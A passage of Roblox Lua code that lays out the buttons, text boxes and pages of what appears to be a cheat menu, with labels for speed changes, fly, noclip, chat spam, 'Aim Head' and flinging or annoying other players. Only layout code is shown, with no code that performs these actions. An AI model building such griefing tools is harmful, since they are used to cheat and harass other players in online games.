Carpet.BorderSizePixel = 0 Carpet.Position = UDim2.new(0.7063995, 0, 0.744432449, 0) Carpet.Size = UDim2.new(0, 92, 0, 25) Carpet.Font = Enum.Font.SourceSans Carpet.FontSize = Enum.FontSize.Size24 Carpet.Text = "Carpet" Carpet.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Carpet.TextSize = 22 Others_toPAGE2.Name = "Others_toPAGE2" Others_toPAGE2.Parent = Others_1 Others_toPAGE2.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Others_toPAGE2.BorderSizePixel = 0 Others_toPAGE2.Position = UDim2.new(0.819999993, 0, 0.0439999998, 0) Others_toPAGE2.Size = UDim2.new(0.113205045, 0, 0.109824568, 0) Others_toPAGE2.Font = Enum.Font.SourceSansLight Others_toPAGE2.FontSize = Enum.FontSize.Size24 Others_toPAGE2.Text = "Next" Others_toPAGE2.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Others_toPAGE2.TextSize = 22 Character_toPAGE2_IMAGE.Name = "Character_toPAGE2_IMAGE" Character_toPAGE2_IMAGE.Parent = Others_toPAGE2 Character_toPAGE2_IMAGE.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Character_toPAGE2_IMAGE.BorderSizePixel = 0 Character_toPAGE2_IMAGE.Position = UDim2.new(0.900659323, 0, 0, 0) Character_toPAGE2_IMAGE.Size = UDim2.new(0, 25, 0, 25) Character_toPAGE2_IMAGE.Image = "http://www.roblox.com/asset/?id=1282737326" Character_2.Name = "Character_2" Character_2.Parent = Pages Character_2.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Character_2.BorderSizePixel = 0 Character_2.Position = UDim2.new(1, 0, 0, 0) Character_2.Size = UDim2.new(1, 0, 1, 0) CharacterTitle.Name = "CharacterTitle" CharacterTitle.Parent = Character_2 CharacterTitle.BackgroundColor3 = Color3.new(1, 1, 1) CharacterTitle.BackgroundTransparency = 1 CharacterTitle.Position = UDim2.new(0.226410091, 0, 0, 0) CharacterTitle.Size = UDim2.new(0.522657692, 0, 0.1364429, 0) CharacterTitle.Font = Enum.Font.SourceSansBold CharacterTitle.FontSize = Enum.FontSize.Size28 CharacterTitle.Text = "Character" CharacterTitle.TextSize = 25 CharacterText.Name = "CharacterText" CharacterText.Parent = Character_2 CharacterText.BackgroundColor3 = Color3.new(1, 1, 1) CharacterText.BackgroundTransparency = 1 CharacterText.Position = UDim2.new(0.158487067, 0, 0.109824568, 0) CharacterText.Size = UDim2.new(0.679230273, 0, 0.0878596455, 0) CharacterText.Font = Enum.Font.SourceSansItalic CharacterText.FontSize = Enum.FontSize.Size24 CharacterText.Text = "Apply cool animations to your player!" CharacterText.TextSize = 19 CharacterText.TextWrapped = true Animations_SPOOKY.Name = "Animations_SPOOKY" Animations_SPOOKY.Parent = Character_2 Animations_SPOOKY.BackgroundColor3 = Color3.new(0.827451, 0.329412, 0) Animations_SPOOKY.BorderSizePixel = 0 Animations_SPOOKY.Position = UDim2.new(0.101884536, 0, 0.263578951, 0) Animations_SPOOKY.Size = UDim2.new(0.200000003, 0, 0.735000014, 0) spookytitle.Name = "spookytitle" spookytitle.Parent = Animations_SPOOKY spookytitle.BackgroundColor3 = Color3.new(1, 1, 1) spookytitle.BackgroundTransparency = 1 spookytitle.Position = UDim2.new(0, 0, 0.0298095234, 0) spookytitle.Size = UDim2.new(0.96661669, 0, 0.149047628, 0) spookytitle.Font = Enum.Font.SourceSansLight spookytitle.FontSize = Enum.FontSize.Size28 spookytitle.Text = "Spooky" spookytitle.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) spookytitle.TextSize = 25 headthrow.Name = "headthrow" headthrow.Parent = Animations_SPOOKY headthrow.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) headthrow.BorderSizePixel = 0 headthrow.Position = UDim2.new(0, 0, 0.238476187, 0) headthrow.Size = UDim2.new(1, 0, 0.119000003, 0) headthrow.Font = Enum.Font.SourceSans headthrow.FontSize = Enum.FontSize.Size14 headthrow.Text = "Head Throw" headthrow.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) headthrow.TextScaled = true headthrow.TextSize = 14 headthrow.TextWrapped = true armsoff.Name = "armsoff" armsoff.Parent = Animations_SPOOKY armsoff.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) armsoff.BorderSizePixel = 0 armsoff.Position = UDim2.new(0, 0, 0.3875238, 0) armsoff.Size = UDim2.new(1, 0, 0.119000003, 0) armsoff.Font = Enum.Font.SourceSans armsoff.FontSize = Enum.FontSize.Size14 armsoff.Text = "Arms Off" armsoff.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) armsoff.TextScaled = true armsoff.TextSize = 14 armsoff.TextWrapped = true loophead.Name = "loophead" loophead.Parent = Animations_SPOOKY loophead.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) loophead.BorderSizePixel = 0 loophead.Position = UDim2.new(0, 0, 0.536571383, 0) loophead.Size = UDim2.new(1, 0, 0.119000003, 0) loophead.Font = Enum.Font.SourceSans loophead.FontSize = Enum.FontSize.Size14 loophead.Text = "Loop Head" loophead.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) loophead.TextScaled = true loophead.TextSize = 14 loophead.TextWrapped = true levitate.Name = "levitate" levitate.Parent = Animations_SPOOKY levitate.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) levitate.BorderSizePixel = 0 levitate.Position = UDim2.new(0, 0, 0.685619056, 0) levitate.Size = UDim2.new(1, 0, 0.119000003, 0) levitate.Font = Enum.Font.SourceSans levitate.FontSize = Enum.FontSize.Size14 levitate.Text = "Levitate" levitate.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) levitate.TextScaled = true levitate.TextSize = 14 levitate.TextWrapped = true headfloat.Name = "headfloat" headfloat.Parent = Animations_SPOOKY headfloat.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) headfloat.BorderSizePixel = 0 headfloat.Position = UDim2.new(0, 0, 0.834666669, 0) headfloat.Size = UDim2.new(1, 0, 0.119000003, 0) headfloat.Font = Enum.Font.SourceSans headfloat.FontSize = Enum.FontSize.Size14 headfloat.Text = "Head Float" headfloat.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) headfloat.TextScaled = true headfloat.TextSize = 14 headfloat.TextWrapped = true Character_backPAGE1.Name = "Character_backPAGE1" Character_backPAGE1.Parent = Character_2 Character_backPAGE1.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Character_backPAGE1.BorderSizePixel = 0 Character_backPAGE1.Position = UDim2.new(0.0679230243, 0, 0.0439298227, 0) Character_backPAGE1.Size = UDim2.new(0.113205045, 0, 0.109824568, 0) Character_backPAGE1.Font = Enum.Font.SourceSansLight Character_backPAGE1.FontSize = Enum.FontSize.Size24 Character_backPAGE1.Text = "Prev" Character_backPAGE1.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Character_backPAGE1.TextSize = 22 Character_toPAGE1_IMAGE.Name = "Character_toPAGE1_IMAGE" Character_toPAGE1_IMAGE.Parent = Character_backPAGE1 Character_toPAGE1_IMAGE.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Character_toPAGE1_IMAGE.BorderSizePixel = 0 Character_toPAGE1_IMAGE.Position = UDim2.new(-0.400293052, 0, 0, 0) Character_toPAGE1_IMAGE.Size = UDim2.new(0, 25, 0, 25) Character_toPAGE1_IMAGE.Image = "http://www.roblox.com/asset/?id=1282894968" Animations_DANCE.Name = "Animations_DANCE" Animations_DANCE.Parent = Character_2 Animations_DANCE.BackgroundColor3 = Color3.new(0.827451, 0.329412, 0) Animations_DANCE.BorderSizePixel = 0 Animations_DANCE.Position = UDim2.new(0.407538146, 0, 0.263578951, 0) Animations_DANCE.Size = UDim2.new(0.200000003, 0, 0.735000014, 0) dancetitle.Name = "dancetitle" dancetitle.Parent = Animations_DANCE dancetitle.BackgroundColor3 = Color3.new(1, 1, 1) dancetitle.BackgroundTransparency = 1 dancetitle.Position = UDim2.new(0, 0, 0.0298095234, 0) dancetitle.Size = UDim2.new(0.96661669, 0, 0.149047628, 0) dancetitle.Font = Enum.Font.SourceSansLight dancetitle.FontSize = Enum.FontSize.Size28 dancetitle.Text = "Dance" dancetitle.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) dancetitle.TextSize = 25 normal.Name = "normal" normal.Parent = Animations_DANCE normal.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) normal.BorderSizePixel = 0 normal.Position = UDim2.new(0, 0, 0.238476187, 0) normal.Size = UDim2.new(1, 0, 0.119000003, 0) normal.Font = Enum.Font.SourceSans normal.FontSize = Enum.FontSize.Size14 normal.Text = "Normal" normal.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) normal.TextScaled = true normal.TextSize = 14 normal.TextWrapped = true movingdance.Name = "movingdance" movingdance.Parent = Animations_DANCE movingdance.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) movingdance.BorderSizePixel = 0 movingdance.Position = UDim2.new(0, 0, 0.3875238, 0) movingdance.Size = UDim2.new(1, 0, 0.119000003, 0) movingdance.Font = Enum.Font.SourceSans movingdance.FontSize = Enum.FontSize.Size14 movingdance.Text = "Moving Dance" movingdance.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) movingdance.TextScaled = true movingdance.TextSize = 14 movingdance.TextWrapped = true insane.Name = "insane" insane.Parent = Animations_DANCE insane.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) insane.BorderSizePixel = 0 insane.Position = UDim2.new(0, 0, 0.834666669, 0) insane.Size = UDim2.new(1, 0, 0.119000003, 0) insane.Font = Enum.Font.SourceSans insane.FontSize = Enum.FontSize.Size14 insane.Text = "Insane" insane.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) insane.TextScaled = true insane.TextSize = 14 insane.TextWrapped = true happy.Name = "happy" happy.Parent = Animations_DANCE happy.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) happy.BorderSizePixel = 0 happy.Position = UDim2.new(0, 0, 0.536571383, 0) happy.Size = UDim2.new(1, 0, 0.119000003, 0) happy.Font = Enum.Font.SourceSans happy.FontSize = Enum.FontSize.Size14 happy.Text = "Happy" happy.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) happy.TextScaled = true happy.TextSize = 14 happy.TextWrapped = true spindance.Name = "spindance" spindance.Parent = Animations_DANCE spindance.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) spindance.BorderSizePixel = 0 spindance.Position = UDim2.new(0, 0, 0.685619056, 0) spindance.Size = UDim2.new(1, 0, 0.119000003, 0) spindance.Font = Enum.Font.SourceSans spindance.FontSize = Enum.FontSize.Size14 spindance.Text = "Spin Dance" spindance.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) spindance.TextScaled = true spindance.TextSize = 14 spindance.TextWrapped = true Animations_HEROIC.Name = "Animations_HEROIC" Animations_HEROIC.Parent = Character_2 Animations_HEROIC.BackgroundColor3 = Color3.new(0.827451, 0.329412, 0) Animations_HEROIC.BorderSizePixel = 0 Animations_HEROIC.Position = UDim2.new(0.713191807, 0, 0.263578951, 0) Animations_HEROIC.Size = UDim2.new(0.200000003, 0, 0.735000014, 0) heroictitle.Name = "heroictitle" heroictitle.Parent = Animations_HEROIC heroictitle.BackgroundColor3 = Color3.new(1, 1, 1) heroictitle.BackgroundTransparency = 1 heroictitle.Position = UDim2.new(0, 0, 0.0298095234, 0) heroictitle.Size = UDim2.new(0.96661669, 0, 0.149047628, 0) heroictitle.Font = Enum.Font.SourceSansLight heroictitle.FontSize = Enum.FontSize.Size28 heroictitle.Text = "Heroic" heroictitle.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) heroictitle.TextSize = 25 swordstrike.Name = "swordstrike" swordstrike.Parent = Animations_HEROIC swordstrike.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) swordstrike.BorderSizePixel = 0 swordstrike.Position = UDim2.new(0, 0, 0.238476187, 0) swordstrike.Size = UDim2.new(1, 0, 0.119000003, 0) swordstrike.Font = Enum.Font.SourceSans swordstrike.FontSize = Enum.FontSize.Size14 swordstrike.Text = "Sword Strike" swordstrike.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) swordstrike.TextScaled = true swordstrike.TextSize = 14 swordstrike.TextWrapped = true jumpland.Name = "jumpland" jumpland.Parent = Animations_HEROIC jumpland.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) jumpland.BorderSizePixel = 0 jumpland.Position = UDim2.new(0, 0, 0.3875238, 0) jumpland.Size = UDim2.new(1, 0, 0.119000003, 0) jumpland.Font = Enum.Font.SourceSans jumpland.FontSize = Enum.FontSize.Size14 jumpland.Text = "Jump Land" jumpland.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) jumpland.TextScaled = true jumpland.TextSize = 14 jumpland.TextWrapped = true punches.Name = "punches" punches.Parent = Animations_HEROIC punches.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) punches.BorderSizePixel = 0 punches.Position = UDim2.new(0, 0, 0.834666669, 0) punches.Size = UDim2.new(1, 0, 0.119000003, 0) punches.Font = Enum.Font.SourceSans punches.FontSize = Enum.FontSize.Size14 punches.Text = "Punches" punches.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) punches.TextScaled = true punches.TextSize = 14 punches.TextWrapped = true swing.Name = "swing" swing.Parent = Animations_HEROIC swing.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) swing.BorderSizePixel = 0 swing.Position = UDim2.new(0, 0, 0.536571383, 0) swing.Size = UDim2.new(1, 0, 0.119000003, 0) swing.Font = Enum.Font.SourceSans swing.FontSize = Enum.FontSize.Size14 swing.Text = "Swing" swing.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) swing.TextScaled = true swing.TextSize = 14 swing.TextWrapped = true crawl.Name = "crawl" crawl.Parent = Animations_HEROIC crawl.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) crawl.BorderSizePixel = 0 crawl.Position = UDim2.new(0, 0, 0.685619056, 0) crawl.Size = UDim2.new(1, 0, 0.119000003, 0) crawl.Font = Enum.Font.SourceSans crawl.FontSize = Enum.FontSize.Size14 crawl.Text = "Crawl" crawl.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) crawl.TextScaled = true crawl.TextSize = 14 crawl.TextWrapped = true Char2_Image.Name = "Char2_Image" Char2_Image.Parent = Character_2 Char2_Image.BackgroundColor3 = Color3.new(1, 1, 1) Char2_Image.BackgroundTransparency = 1 Char2_Image.Position = UDim2.new(0.792435288, 0, 0.0219649114, 0) Char2_Image.Size = UDim2.new(0.101884536, 0, 0.197684199, 0) Char2_Image.Image = "http://www.roblox.com/asset/?id=1282931168" Character_1.Name = "Character_1" Character_1.Parent = Pages Character_1.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Character_1.BorderSizePixel = 0 Character_1.Position = UDim2.new(11, 0, 0, 0) Character_1.Size = UDim2.new(1, 0, 1, 0) CharacterTitle_2.Name = "CharacterTitle" CharacterTitle_2.Parent = Character_1 CharacterTitle_2.BackgroundColor3 = Color3.new(1, 1, 1) CharacterTitle_2.BackgroundTransparency = 1 CharacterTitle_2.Position = UDim2.new(0.226410091, 0, 0, 0) CharacterTitle_2.Size = UDim2.new(0.522657692, 0, 0.1364429, 0) CharacterTitle_2.Font = Enum.Font.SourceSansBold CharacterTitle_2.FontSize = Enum.FontSize.Size28 CharacterTitle_2.Text = "Character" CharacterTitle_2.TextSize = 25 Char_Image_2.Name = "Char_Image" Char_Image_2.Parent = Character_1 Char_Image_2.BackgroundColor3 = Color3.new(1, 1, 1) Char_Image_2.BackgroundTransparency = 1 Char_Image_2.Position = UDim2.new(0.0792435333, 0, 0.109824568, 0) Char_Image_2.Size = UDim2.new(0.0908969939, 0, 0.175596073, 0) Char_Image_2.Image = "http://www.roblox.com/asset/?id=1281299598" CharacterText_2.Name = "CharacterText" CharacterText_2.Parent = Character_1 CharacterText_2.BackgroundColor3 = Color3.new(1, 1, 1) CharacterText_2.BackgroundTransparency = 1 CharacterText_2.Position = UDim2.new(0.147166565, 0, 0.109824568, 0) CharacterText_2.Size = UDim2.new(0.679230273, 0, 0.175719291, 0) CharacterText_2.Font = Enum.Font.SourceSansItalic CharacterText_2.FontSize = Enum.FontSize.Size24 CharacterText_2.Text = "Change your character's speed and other stats, give yourself fly, noclip and more!" CharacterText_2.TextSize = 19 CharacterText_2.TextWrapped = true TXTBOX_Stats.Name = "TXTBOX_Stats" TXTBOX_Stats.Parent = Character_1 TXTBOX_Stats.BackgroundColor3 = Color3.new(0.956863, 0.968628, 0.972549) TXTBOX_Stats.BorderColor3 = Color3.new(0.152941, 0.682353, 0.376471) TXTBOX_Stats.BorderSizePixel = 6 TXTBOX_Stats.Position = UDim2.new(0.0905640349, 0, 0.373403519, 0) TXTBOX_Stats.Size = UDim2.new(0.18112807, 0, 0.0878596455, 0) TXTBOX_Stats.Font = Enum.Font.SourceSans TXTBOX_Stats.FontSize = Enum.FontSize.Size14 TXTBOX_Stats.Text = "Number" TXTBOX_Stats.TextScaled = true TXTBOX_Stats.TextSize = 14 TXTBOX_Stats.TextWrapped = true BackGroundChar.Name = "BackGroundChar" BackGroundChar.Parent = Character_1 BackGroundChar.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) BackGroundChar.BorderSizePixel = 0 BackGroundChar.Position = UDim2.new(0.0769999996, 0, 0.48300001, 0) BackGroundChar.Size = UDim2.new(0, 92, 0, 118) HipHeight.Name = "HipHeight" HipHeight.Parent = BackGroundChar HipHeight.BackgroundColor3 = Color3.new(0.180392, 0.8, 0.443137) HipHeight.BorderSizePixel = 0 HipHeight.Position = UDim2.new(0, 0, 0.679050863, 0) HipHeight.Size = UDim2.new(0, 92, 0, 25) HipHeight.Font = Enum.Font.SourceSans HipHeight.FontSize = Enum.FontSize.Size24 HipHeight.Text = "HipHeight" HipHeight.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) HipHeight.TextSize = 22 JumpHeight.Name = "JumpHeight" JumpHeight.Parent = BackGroundChar JumpHeight.BackgroundColor3 = Color3.new(0.180392, 0.8, 0.443137) JumpHeight.BorderSizePixel = 0 JumpHeight.Position = UDim2.new(0, 0, 0.381966084, 0) JumpHeight.Size = UDim2.new(0, 92, 0, 25) JumpHeight.Font = Enum.Font.SourceSans JumpHeight.FontSize = Enum.FontSize.Size24 JumpHeight.Text = "JumpHeight" JumpHeight.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) JumpHeight.TextSize = 20 Speed.Name = "Speed" Speed.Parent = BackGroundChar Speed.BackgroundColor3 = Color3.new(0.180392, 0.8, 0.443137) Speed.BorderSizePixel = 0 Speed.Position = UDim2.new(0, 0, 0.0848813578, 0) Speed.Size = UDim2.new(0, 92, 0, 25) Speed.Font = Enum.Font.SourceSans Speed.FontSize = Enum.FontSize.Size24 Speed.Text = "Speed" Speed.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Speed.TextSize = 22 TXTBOX_Chat.Name = "TXTBOX_Chat" TXTBOX_Chat.Parent = Character_1 TXTBOX_Chat.BackgroundColor3 = Color3.new(0.956863, 0.968628, 0.972549) TXTBOX_Chat.BorderColor3 = Color3.new(0.152941, 0.682353, 0.376471) TXTBOX_Chat.BorderSizePixel = 6 TXTBOX_Chat.Position = UDim2.new(0.384897143, 0, 0.373403519, 0) TXTBOX_Chat.Size = UDim2.new(0.520743191, 0, 0.0878596455, 0) TXTBOX_Chat.Font = Enum.Font.SourceSans TXTBOX_Chat.FontSize = Enum.FontSize.Size14 TXTBOX_Chat.Text = "Text for chatting" TXTBOX_Chat.TextScaled = true TXTBOX_Chat.TextSize = 14 TXTBOX_Chat.TextWrapped = true BackGroundChar2.Name = "BackGroundChar2" BackGroundChar2.Parent = Character_1 BackGroundChar2.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) BackGroundChar2.BorderSizePixel = 0 BackGroundChar2.Position = UDim2.new(0.370000005, 0, 0.48300001, 0) BackGroundChar2.Size = UDim2.new(0, 242, 0, 40) Chat.Name = "Chat" Chat.Parent = BackGroundChar2 Chat.BackgroundColor3 = Color3.new(0.180392, 0.8, 0.443137) Chat.BorderSizePixel = 0 Chat.Position = UDim2.new(0.0620288812, 0, 0.125200003, 0) Chat.Size = UDim2.new(0, 92, 0, 25) Chat.Font = Enum.Font.SourceSans Chat.FontSize = Enum.FontSize.Size24 Chat.Text = "Chat" Chat.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Chat.TextSize = 22 Spam_2.Name = "Spam" Spam_2.Parent = BackGroundChar2 Spam_2.BackgroundColor3 = Color3.new(0.180392, 0.8, 0.443137) Spam_2.BorderSizePixel = 0 Spam_2.Position = UDim2.new(0.558259964, 0, 0.125200003, 0) Spam_2.Size = UDim2.new(0, 92, 0, 25) Spam_2.Font = Enum.Font.SourceSans Spam_2.FontSize = Enum.FontSize.Size24 Spam_2.Text = "Spam" Spam_2.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Spam_2.TextSize = 22 BackGroundChar3.Name = "BackGroundChar3" BackGroundChar3.Parent = Character_1 BackGroundChar3.BackgroundColor3 = Color3.new(0.0862745, 0.627451, 0.521569) BackGroundChar3.BorderSizePixel = 0 BackGroundChar3.Position = UDim2.new(0.372000009, 0, 0.742999971, 0) BackGroundChar3.Size = UDim2.new(0, 242, 0, 43) Noclip.Name = "Noclip" Noclip.Parent = BackGroundChar3 Noclip.BackgroundColor3 = Color3.new(0.101961, 0.737255, 0.611765) Noclip.BorderSizePixel = 0 Noclip.Position = UDim2.new(0.558000028, 0, 0.208000004, 0) Noclip.Size = UDim2.new(0, 92, 0, 25) Noclip.Font = Enum.Font.SourceSans Noclip.FontSize = Enum.FontSize.Size24 Noclip.Text = "Noclip" Noclip.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Noclip.TextSize = 22 Fly.Name = "Fly" Fly.Parent = BackGroundChar3 Fly.BackgroundColor3 = Color3.new(0.101961, 0.737255, 0.611765) Fly.BorderSizePixel = 0 Fly.Position = UDim2.new(0.061999999, 0, 0.208000004, 0) Fly.Size = UDim2.new(0, 92, 0, 25) Fly.Font = Enum.Font.SourceSans Fly.FontSize = Enum.FontSize.Size24 Fly.Text = "Fly" Fly.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Fly.TextSize = 22 Character_toPAGE2.Name = "Character_toPAGE2" Character_toPAGE2.Parent = Character_1 Character_toPAGE2.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Character_toPAGE2.BorderSizePixel = 0 Character_toPAGE2.Position = UDim2.new(0.819999993, 0, 0.0439999998, 0) Character_toPAGE2.Size = UDim2.new(0.113205045, 0, 0.109824568, 0) Character_toPAGE2.Font = Enum.Font.SourceSansLight Character_toPAGE2.FontSize = Enum.FontSize.Size24 Character_toPAGE2.Text = "Next" Character_toPAGE2.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Character_toPAGE2.TextSize = 22 Character_toPAGE2_IMAGE_2.Name = "Character_toPAGE2_IMAGE" Character_toPAGE2_IMAGE_2.Parent = Character_toPAGE2 Character_toPAGE2_IMAGE_2.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Character_toPAGE2_IMAGE_2.BorderSizePixel = 0 Character_toPAGE2_IMAGE_2.Position = UDim2.new(0.900659323, 0, 0, 0) Character_toPAGE2_IMAGE_2.Size = UDim2.new(0, 25, 0, 25) Character_toPAGE2_IMAGE_2.Image = "http://www.roblox.com/asset/?id=1282737326" Others_2.Name = "Others_2" Others_2.Parent = Pages Others_2.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Others_2.BorderSizePixel = 0 Others_2.Position = UDim2.new(1, 0, 0, 0) Others_2.Size = UDim2.new(1, 0, 1, 0) OthersTitle_2.Name = "OthersTitle" OthersTitle_2.Parent = Others_2 OthersTitle_2.BackgroundColor3 = Color3.new(1, 1, 1) OthersTitle_2.BackgroundTransparency = 1 OthersTitle_2.Position = UDim2.new(0.226410091, 0, 0, 0) OthersTitle_2.Size = UDim2.new(0.522657692, 0, 0.1364429, 0) OthersTitle_2.Font = Enum.Font.SourceSansBold OthersTitle_2.FontSize = Enum.FontSize.Size28 OthersTitle_2.Text = "Others" OthersTitle_2.TextSize = 25 Other_Image2.Name = "Other_Image2" Other_Image2.Parent = Others_2 Other_Image2.BackgroundColor3 = Color3.new(1, 1, 1) Other_Image2.BackgroundTransparency = 1 Other_Image2.Position = UDim2.new(0.0113205044, 0, 0.197684199, 0) Other_Image2.Size = UDim2.new(0.101884536, 0, 0.197684199, 0) Other_Image2.Image = "http://www.roblox.com/asset/?id=1284941440" OthersText_2.Name = "OthersText" OthersText_2.Parent = Others_2 OthersText_2.BackgroundColor3 = Color3.new(1, 1, 1) OthersText_2.BackgroundTransparency = 1 OthersText_2.Position = UDim2.new(0.203769073, 0, 0.109824568, 0) OthersText_2.Size = UDim2.new(0.577345729, 0, 0.175719291, 0) OthersText_2.Font = Enum.Font.SourceSansItalic OthersText_2.FontSize = Enum.FontSize.Size24 OthersText_2.Text = "Use rocket propulsion to push, fling, and annoy players!" OthersText_2.TextSize = 19 OthersText_2.TextWrapped = true TXTBOX_PlrName2.Name = "TXTBOX_PlrName2" TXTBOX_PlrName2.Parent = Others_2 TXTBOX_PlrName2.BackgroundColor3 = Color3.new(0.956863, 0.968628, 0.972549) TXTBOX_PlrName2.BorderColor3 = Color3.new(0.152941, 0.682353, 0.376471) TXTBOX_PlrName2.BorderSizePixel = 0 TXTBOX_PlrName2.Position = UDim2.new(0.249051109, 0, 0.395368397, 0) TXTBOX_PlrName2.Size = UDim2.new(0.520743191, 0, 0.0878596455, 0) TXTBOX_PlrName2.ZIndex = 2 TXTBOX_PlrName2.Font = Enum.Font.SourceSans TXTBOX_PlrName2.FontSize = Enum.FontSize.Size14 TXTBOX_PlrName2.Text = "Player" TXTBOX_PlrName2.TextScaled = true TXTBOX_PlrName2.TextSize = 14 TXTBOX_PlrName2.TextWrapped = true othersBaseBackground2.Name = "othersBaseBackground2" othersBaseBackground2.Parent = Others_2 othersBaseBackground2.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) othersBaseBackground2.BorderSizePixel = 0 othersBaseBackground2.Position = UDim2.new(0.124525554, 0, 0.351438582, 0) othersBaseBackground2.Size = UDim2.new(0.769999981, 0, 0.649999976, 0) Flatten.Name = "Flatten" Flatten.Parent = othersBaseBackground2 Flatten.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) Flatten.BorderSizePixel = 0 Flatten.Position = UDim2.new(0.0588666238, 0, 0.27070269, 0) Flatten.Size = UDim2.new(0, 92, 0, 25) Flatten.Font = Enum.Font.SourceSans Flatten.FontSize = Enum.FontSize.Size24 Flatten.Text = "Flatten" Flatten.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Flatten.TextSize = 22 AimHead.Name = "AimHead" AimHead.Parent = othersBaseBackground2 AimHead.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) AimHead.BorderSizePixel = 0 AimHead.Position = UDim2.new(0.367916405, 0, 0.27070269, 0) AimHead.Size = UDim2.new(0, 92, 0, 25) AimHead.Font = Enum.Font.SourceSans AimHead.FontSize = Enum.FontSize.Size24 AimHead.Text = "Aim Head" AimHead.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) AimHead.TextSize = 22 Float.Name = "Float" Float.Parent = othersBaseBackground2 Float.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) Float.BorderSizePixel = 0 Float.Position = UDim2.new(0.0588666238, 0, 0.507567585, 0) Float.Size = UDim2.new(0, 92, 0, 25) Float.Font = Enum.Font.SourceSans Float.FontSize = Enum.FontSize.Size24 Float.Text = "Float" Float.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Float.TextSize = 22 Multiple.Name = "Multiple" Multiple.Parent = othersBaseBackground2 Multiple.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) Multiple.BorderSizePixel = 0 Multiple.Position = UDim2.new(0.367916405, 0, 0.507567585, 0) Multiple.Size = UDim2.new(0, 92, 0, 25) Multiple.Font = Enum.Font.SourceSans Multiple.FontSize = Enum.FontSize.Size24 Multiple.Text = "Multiple" Multiple.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Multiple.TextSize = 22 Animated.Name = "Animated" Animated.Parent = othersBaseBackground2 Animated.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) Animated.BorderSizePixel = 0 Animated.Position = UDim2.new(0.67696619, 0, 0.27070269, 0) Animated.Size = UDim2.new(0, 92, 0, 25) Animated.Font = Enum.Font.SourceSans Animated.FontSize = Enum.FontSize.Size24 Animated.Text = "Animated" Animated.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Animated.TextSize = 22 SlowAttract.Name = "SlowAttract" SlowAttract.Parent = othersBaseBackground2 SlowAttract.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) SlowAttract.BorderSizePixel = 0 SlowAttract.Position = UDim2.new(0.67696619, 0, 0.507567585, 0) SlowAttract.Size = UDim2.new(0, 92, 0, 25) SlowAttract.Font = Enum.Font.SourceSans SlowAttract.FontSize = Enum.FontSize.Size24 SlowAttract.Text = "SlowAttract" SlowAttract.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) SlowAttract.TextSize = 22 WeirdOrbit.Name = "WeirdOrbit" WeirdOrbit.Parent = othersBaseBackground2 WeirdOrbit.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) WeirdOrbit.BorderSizePixel = 0 